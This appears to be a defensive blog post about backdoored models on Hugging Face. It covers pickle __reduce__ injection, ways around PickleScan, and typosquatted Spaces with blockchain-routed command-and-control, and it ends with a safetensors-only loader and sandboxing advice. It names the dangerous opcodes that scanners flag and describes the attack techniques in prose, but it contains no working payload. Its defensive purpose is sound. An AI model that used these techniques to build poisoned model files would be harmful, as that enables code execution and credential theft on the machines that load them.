Hugging Face Pulled Dozens of Backdoored Models. Here's the Pattern.

#ai #agents #llm #security

Book: AI Agents Pocket Guide
Also by me: Prompt Engineering Pocket Guide
My project: Hermes IDE | GitHub — an IDE for developers who ship with Claude Code and other AI coding tools
Me: xgabriel.com | GitHub

In April 2026, a typosquatted Hugging Face Space called vsccode-modetx started serving a Go-based backdoor that used the NKN blockchain for command-and-control, disguising the binary as a Kubernetes agent named kagent. The underlying flaw, tracked as CVE-2026-39987, gave unauthenticated attackers a full interactive shell on the host that loaded the model. According to Cyberpress's reporting, first active exploitation was logged less than 10 hours after the advisory was published, and over a three-day window attackers from roughly a dozen IP addresses across multiple countries fired hundreds of exploit events. One operator used the foothold to extract AWS access keys, Postgres connection strings, and OpenAI API tokens from environment variables on data-science workstations.

This is the third widely-reported round of AI-supply-chain takedowns on Hugging Face since 2024. In 2024, ReversingLabs found malicious models smuggled in via pickle deserialization. In early 2025, JFrog flagged 100+ malicious code-execution models. In 2026 the attackers moved up the stack to typosquatted Spaces with blockchain-routed C2.

If you load models from Hugging Face into a Python process, you are running their code on your machine. Worth knowing what shape that code arrives in, and how to load weights without giving an attacker your laptop.

The three attack shapes that keep working

There are three primary paths and they have not changed much in two years.

Pickle injection in .bin and .pt files. PyTorch's default save format wraps weights in Python's pickle module. Pickle's load step executes arbitrary Python. Attackers override the __reduce__ method on a custom class so that torch.load() runs an arbitrary Python payload as a side effect of "deserializing" the model. JFrog's 2024 analysis found that around 95% of malicious models on Hugging Face are PyTorch pickle files, and roughly 5% are TensorFlow Keras. The payload is whatever the attacker wants: a reverse shell, an exfiltration script, a cryptominer.

Pickle scanner evasion. Hugging Face runs PickleScan to flag dangerous opcodes in pickle files. Researchers have shown that the scanner can be evaded by using broken or malformed pickle streams that the scanner refuses to parse but torch.load() will still happily execute. JFrog disclosed three zero-days in PickleScan that were fixed in version 0.0.31 in September 2025. Earlier in 2025 The Hacker News covered a separate broken-pickle bypass. The scanner is part of the defense; it is not a guarantee.

Typosquatted Spaces with embedded RCE. The newest shape. The attacker publishes a Hugging Face Space whose name is a one-character variation on a popular tool. Users land on the Space looking for the legitimate version, run the install snippet, and the snippet pulls a binary that opens a backdoor. The April 2026 wave used this pattern with a blockchain-routed C2 channel that survives takedowns of any single command server.

Adjacent shapes show up less often: weight-poisoning attacks where the model is trained to behave maliciously on a trigger phrase, and watermark-exfiltration where a fine-tune leaks training data through structured output. Both real, both rarer than pickle injection by orders of magnitude.

What Hugging Face has been doing about it

Three layers of response, in increasing order of how much you should rely on them.

PickleScan, since 2023. Static analysis of pickle opcodes at upload time. Flags posix.system, subprocess.Popen, eval, exec, and the rest. Useful as a coarse filter. Demonstrably bypassable.

Partnership with security vendors, since 2024. JFrog and Hugging Face joined forces to scan uploaded models with deeper tooling and take down malicious ones. Takedown rounds are now routine; the dozens flagged in the April 2026 batch are part of a continuous pipeline rather than a one-time event.

Promotion of safetensors as the default format. Safetensors is a serialization format that stores tensors as raw bytes plus a JSON header. No Python objects, no pickle, no __reduce__. Independent security audits have validated the format. Hugging Face flips repos to safetensors-default whenever possible. The catch: a large share of Hugging Face repositories still contain pickle models, because old models exist and conversion is not free.

The platform's defenses help. They do not absolve you of running unknown code on your hardware.

The defensive practices that matter

Six things, in priority order:

Prefer safetensors. When you choose between two model artifacts and one is .safetensors, take it. When the only option is .bin or .pt, decide whether you trust the publisher.
Pin to a specific commit hash. Hugging Face exposes a revision argument on every load function. A commit hash is immutable; a tag is not. If a maintainer's account is compromised, your pinned revision is unaffected.
Run model loads in a sandbox. A short-lived container, a firejail or bubblewrap profile, a separate user account. The attacker's payload runs as the loading process; constrain that process.
Strip credentials from the loading environment. No AWS profile, no OPENAI_API_KEY, no Postgres connection string in the env of the process that calls torch.load(). The April 2026 incident was specifically about credential exfil from env vars.
Use weights_only=True for torch.load. PyTorch 2.6 made weights_only=True the default; on 2.4 and 2.5 you have to pass it explicitly. It refuses to deserialize anything that is not a tensor or a small allowlist of types. A meaningful step. Doesn't catch every shape, but it breaks the most common pickle-RCE path.
Scan files before load. Run picklescan and modelscan over downloaded artifacts. Treat any flag as a hard stop. False positives happen; sort them out before, not during, a load.

A 20-line restricted loader

Python. Loads weights from safetensors only, refuses pickle, runs in a hardened subprocess. Use it as a wrapper around any unverified model.

import os, subprocess, sys
from pathlib import Path
from huggingface_hub import hf_hub_download
from safetensors.torch import load_file

def load_safe(repo: str, filename: str, revision: str):
    if not filename.endswith(".safetensors"):
        raise ValueError("safetensors only; refuse pickle")
    path = hf_hub_download(
        repo_id=repo, filename=filename, revision=revision
    )
    # safetensors format: bytes 0-7 are the JSON header length as little-endian u64
    head = Path(path).read_bytes()[:8]
    if int.from_bytes(head, "little") > 100_000_000:
        raise ValueError("header too large; suspicious file")
    return load_file(path, device="cpu")

if __name__ == "__main__":
    for var in ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY",
                "OPENAI_API_KEY", "DATABASE_URL", "PGPASSWORD"):
        os.environ.pop(var, None)
    weights = load_safe(
        repo=sys.argv[1],
        filename=sys.argv[2],
        revision=sys.argv[3],  # full commit hash, not a tag
    )
    print(f"loaded {len(weights)} tensors")

Three properties worth naming. The function refuses anything that is not a .safetensors file at the filename level. No fallback to pickle. It validates the safetensors header length so a malformed file with a 2GB header claim cannot push the loader into a bad allocation. It pins to a revision argument that you must pass as a full commit hash, not a tag, and it pops the most-targeted credential env vars before the load so the loaded code cannot exfiltrate them through os.environ.

For real isolation, run this script inside a container with --read-only, --cap-drop=ALL, and --network=none (or a network policy that only reaches Hugging Face), then mount the output tensor file out. The loader becomes the trust boundary; whatever happens inside it cannot reach your other env.

What this means for agent stacks

Agents that load models from registries are the most exposed shape. The agent calls a tool that downloads a model. The model carries a payload. The payload runs with the agent's permissions, which usually include the agent's tool credentials, which usually include API tokens for everything the agent can touch.

Two practices that compose well with the loader above:

Treat model loading as a tool call, not an import. Route every model download through a single function with the safe-load contract. Audit log every call. No from_pretrained() strewn across your codebase.
Separate the loading process from the inference process. Load weights in a sandboxed worker. Hand the loaded weights to a long-running inference process via shared memory or a serialized handoff. The inference process never deserializes pickle.

These shapes also help the unrelated case of a maintainer's account being compromised mid-week. Pinned revision plus restricted loader plus sandboxed worker means a hostile push to main does not become a hostile execution on your hardware.

The closer

The underlying mechanic is the same pickle problem the community has been talking about for three years. Safetensors solves the first attack class. Sandboxing and credential hygiene solve the rest. Both are work. Both are cheaper than the postmortem you write after an OPENAI_API_KEY leaks from a research workstation at 2 AM.

If this was useful

Most agent vulnerabilities are not novel attacks on the model. They are old supply-chain attacks routed through new package ecosystems. The AI Agents Pocket Guide covers the patterns for sandboxing tool execution and isolating high-risk operations like model loading. If your agents write or read prompts that ride near user input, the Prompt Engineering Pocket Guide covers the prompt-injection adjacent class — different attack surface, same mindset of trusting nothing the model touches.